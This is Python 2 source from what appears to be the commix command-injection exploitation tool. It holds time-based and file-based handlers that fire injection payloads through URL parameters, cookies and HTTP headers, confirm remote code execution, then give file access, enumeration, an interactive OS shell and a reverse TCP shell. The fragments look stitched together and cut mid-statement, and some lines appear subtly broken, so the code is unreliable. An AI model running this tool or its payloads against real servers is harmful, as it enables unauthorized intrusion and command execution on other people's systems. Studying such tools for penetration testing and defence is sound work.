(output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise break if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False is_vulnerable = False again_warning = True false_positive_warning = False export_injection_info = False how_long = 0 how_long_statistic = 0 injection_type = "Blind Command Injection" technique = "time-based injection technique" if menu.options.verbose: print settings.INFO_SIGN + "Testing the " + technique + "... " # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Fore.YELLOW + settings.WARNING_SIGN + "The '--url-reload' option is not available in " + technique + "." + Style.RESET_ALL # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification( url, technique): cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation( url, http_request_method) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, delay, filename, http_request_method) if not settings.LOAD_SESSION: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell( separator, TAG, output_length, delay, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision( separator, TAG, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: print Fore.GREY + settings.PAYLOAD_SIGN + payload.replace( "\n", "\\n") + Style.RESET_ALL # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) how_long = tb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) how_long = tb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) how_long = tb_injector.referer_injection_test( url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter( settings.INJECT_TAG) how_long = tb_injector.custom_header_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test( payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic = how_long_statistic + how_long # Reset the how_long_statistic counter if output_length == tag_length - 1: how_long_statistic = 0 # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format( round(((num_of_chars * 100) / (total * 1.0)), 2)) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Windows targets. if settings.TARGET_OS == "win": if how_long > (how_long_statistic / output_length): false_positive_fixation = True else: false_positive_warning = True # Unix-like targets. else: if delay == 1 and (how_long_statistic == delay) or \ delay == 1 and (how_long_statistic == how_long) or \ delay > 1 and (how_long_statistic == (output_length + delay)) and \ how_long == delay + 1: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning and again_warning: again_warning = False warning_msg = settings.WARNING_SIGN + "Unexpected time delays have been identified due to unstable " warning_msg += "requests. This behavior which may lead to false-positive results." sys.stdout.write("\r" + Fore.YELLOW + warning_msg + Style.RESET_ALL) print "" # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"print (" + str( randv1) + " + " + str( randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str( randv1) + " + " + str( randv2) + ")" else: cmd = "(" + str( randv1) + " + " + str( randv2) + ")" # Check for false positive resutls how_long, output = tb_injector.false_positive_check( separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if str(output) == str( randvcalc) and len( TAG) == output_length: is_vulnerable = True how_long_statistic = 0 if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break # False positive else: if not menu.options.verbose: percent = str(float_percent) + "%" sys.stdout.write( "\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() continue else: if not menu.options.verbose: percent = str(float_percent) + "%" sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() continue if not menu.options.verbose: sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: break break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if (len(TAG) == output_length) and \ (is_vulnerable == True or settings.LOAD_SESSION and is_vulnerable == "True"): found = True no_result = False if settings.LOAD_SESSION: is_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: print "" # Print the findings to terminal. print Style.BRIGHT + "(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", payload.replace( "\n", "\\n")) + Style.RESET_ALL if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation( url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable) is_vulnerable = False else: settings.LOAD_SESSION = False new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input( "\n" + settings.QUESTION_SIGN + "Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOICE_YES: tb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: if menu.enumeration_options(): tb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( settings.QUESTION_SIGN + "Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOICE_YES: tb_file_access.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + file_access_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print "" tb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results( cmd, separator, output, check_how_long) sys.exit(0) if not new_line: print "" # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input( settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal? [Y/n/q] > " ).lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp( ) if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options( ) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. from src.core.injections.results_based.techniques.classic import cb_injector separator = checks.time_based_separators( separator, http_request_method) whitespace = settings.WHITESPACES[ 0] response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results( response, TAG) # Export injection result if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection has been failed!" + Style.RESET_ALL else: pass else: print "" if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tb_injector.injection( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results( cmd, separator, output, check_how_long) if not menu.options.ignore_session: session_handler.store_cmd( url, cmd, output, vuln_parameter) else: output = session_handler.export_stored_cmd( url, cmd, vuln_parameter) print Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL print "" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass #break if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def fb_injection_handler(url, delay, filename, http_request_method, url_time_response): counter = 1 vp_flag = True exit_loops = False no_result = True is_encoded = False stop_injection = False call_tmp_based = False next_attack_vector = False export_injection_info = False injection_type = "semi-blind command injection" technique = "file-based injection technique" # Set temp path if settings.TARGET_OS == "win": if "microsoft-iis" in settings.SERVER_BANNER.lower(): settings.TMP_PATH = "C:\\Windows\TEMP\\" else: settings.TMP_PATH = "%temp%\\" else: settings.TMP_PATH = "/tmp/" if menu.options.tmp_path: tmp_path = menu.options.tmp_path else: tmp_path = settings.TMP_PATH if settings.DEFAULT_SRV_ROOT_DIR != settings.SRV_ROOT_DIR: settings.SRV_ROOT_DIR = settings.DEFAULT_SRV_ROOT_DIR if menu.options.file_dest and '/tmp/' in menu.options.file_dest: call_tmp_based = True else: if menu.options.srv_root_dir: settings.SRV_ROOT_DIR = menu.options.srv_root_dir else: # Debian/Ubunt have been updated to use /var/www/html as default instead of /var/www. if "apache" in settings.SERVER_BANNER.lower(): if "debian" or "ubuntu" in settings.SERVER_BANNER.lower(): try: check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower()) if check_version[0] > "2.3" and not settings.TARGET_OS == "win": # Add "/html" to servers root directory settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR except IndexError: pass # Add "/html" to servers root directory elif "fedora" or "centos" in settings.SERVER_BANNER.lower(): settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: pass # On more recent versions (>= "1.2.4") the default root path has changed to "/usr/share/nginx/html" elif "nginx" in settings.SERVER_BANNER.lower(): try: check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower()) if check_version[0] >= "1.2.4": # Add "/html" to servers root directory settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: # Add "/www" to servers root directory settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/www" except IndexError: pass elif "microsoft-iis" in settings.SERVER_BANNER.lower(): pass else: # Provide custom server's root directory. custom_srv_root_dir() path = urlparse.urlparse(url).path path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] EXTRA_DIR = path.replace(last_param, "") settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + EXTRA_DIR if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR.replace("/","\\") if not settings.LOAD_SESSION or settings.RETEST == True: info_msg = "Trying to create a file in '" + settings.SRV_ROOT_DIR + "'... " print settings.print_info_msg(info_msg) i = 0 TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) # Check if defined alter shell alter_shell = menu.options.alter_shell for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification(url, technique): url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) OUTPUT_TEXTFILE = TAG + ".txt" if technique == "tempfile-based injection technique": #settings.LOAD_SESSION = True tfb_handler.exploitation(url, delay, filename, tmp_path, http_request_method, url_time_response) if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, delay, filename, http_request_method) if not settings.LOAD_SESSION: i = i + 1 # The output file for file-based injection technique. OUTPUT_TEXTFILE = TAG + ".txt" # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). if alter_shell : payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE) else: payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") print settings.print_payload(payload_msg) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = fb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = fb_injector.referer_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) response = fb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url) # Find the directory. output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay) time.sleep(delay) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) if len(shell) != 0 and shell[0] == TAG and not settings.VERBOSITY_LEVEL >= 1: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL info_msg = "Testing the " + technique + "... [ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if len(shell) == 0 : # delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # if settings.VERBOSITY_LEVEL >= 1: # print "" raise urllib2.HTTPError(url, 404, 'Error', {}, None) except urllib2.HTTPError, e: if str(e.getcode()) == settings.NOT_FOUND_ERROR: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if call_tmp_based == True: exit_loops = True tmp_path = os.path.split(menu.options.file_dest)[0] + "/" tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) raise # Show an error message, after N failed tries. # Use the "/tmp/" directory for tempfile-based technique. elif i == settings.FAILED_TRIES and no_result == True : warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.SRV_ROOT_DIR + "'." sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) print "" while True: question_msg = "Do you want to try the temporary directory (" + tmp_path + ") [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) tmp_upload = sys.stdin.readline().replace("\n","").lower() if tmp_upload in settings.CHOICE_YES: exit_loops = True settings.TEMPFILE_BASED_STATE = True call_tfb = tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) if call_tfb != False: return True else: if no_result == True: return False else: return True elif tmp_upload in settings.CHOICE_NO: break elif tmp_upload in settings.CHOICE_QUIT: print "" raise else: if tmp_upload == "": tmp_upload = "enter" err_msg = "'" + tmp_upload + "' is not a valid answer." print settings.print_error_msg(err_msg) pass continue else: if exit_loops == False: if not settings.VERBOSITY_LEVEL >= 1: if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" else: percent = str(float_percent)+ "%" info_msg = "Testing the " + technique + "... [ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: continue else: raise elif str(e.getcode()) == settings.UNAUTHORIZED_ERROR: err_msg = "Authorization required!" print settings.print_critical_msg(err_msg) + "\n" sys.exit(0) elif str(e.getcode()) == settings.FORBIDDEN_ERROR: err_msg = "You don't have permission to access this page." print settings.print_critical_msg(err_msg) + "\n" sys.exit(0) except KeyboardInterrupt: if settings.VERBOSITY_LEVEL >= 1: print "" # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: if 'vuln_parameter' in locals(): # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except urllib2.URLError, e: warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.SRV_ROOT_DIR + "'." sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) print "" # Provide custom server's root directory. custom_srv_root_dir() continue except: raise # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if not settings.VERBOSITY_LEVEL >= 1 and \ not menu.options.alter_shell and \ not next_attack_vector: next_attack_vector = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.VERBOSITY_LEVEL >= 1 and not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The" if found_vuln_parameter == " ": success_msg += http_request_method + "" success_msg += the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, delay=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() if enumerate_again in settings.CHOICE_YES: fb_enumeration.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print "" break elif enumerate_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): fb_enumeration.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if not menu.file_access_options() and not menu.options.os_cmd: if not settings.VERBOSITY_LEVEL >= 1: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : if settings.ENUMERATION_DONE != True: print "" while True: question_msg = "Do you want to access files again? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() if file_access_again in settings.CHOICE_YES: fb_file_access.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print "" break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.file_access_options(): if not menu.enumeration_options(): print "" fb_file_access.do_check(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) #print "" # Check if defined single cmd. if menu.options.os_cmd: # if not menu.file_access_options(): # print "" fb_enumeration.single_os_cmd_exec(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: # Delete previous shell (text) files (output) if settings.VERBOSITY_LEVEL >= 1: print "" delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.VERBOSITY_LEVEL >= 1: print "" if go_back == True: break question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) # if settings.VERBOSITY_LEVEL >= 1: # print "" if cmd.lower() in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, delay, go_back_again) if go_back: break else: response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Command execution results. shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay) shell = "".join(str(p) for p in shell) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, shell, vuln_parameter) else: shell = 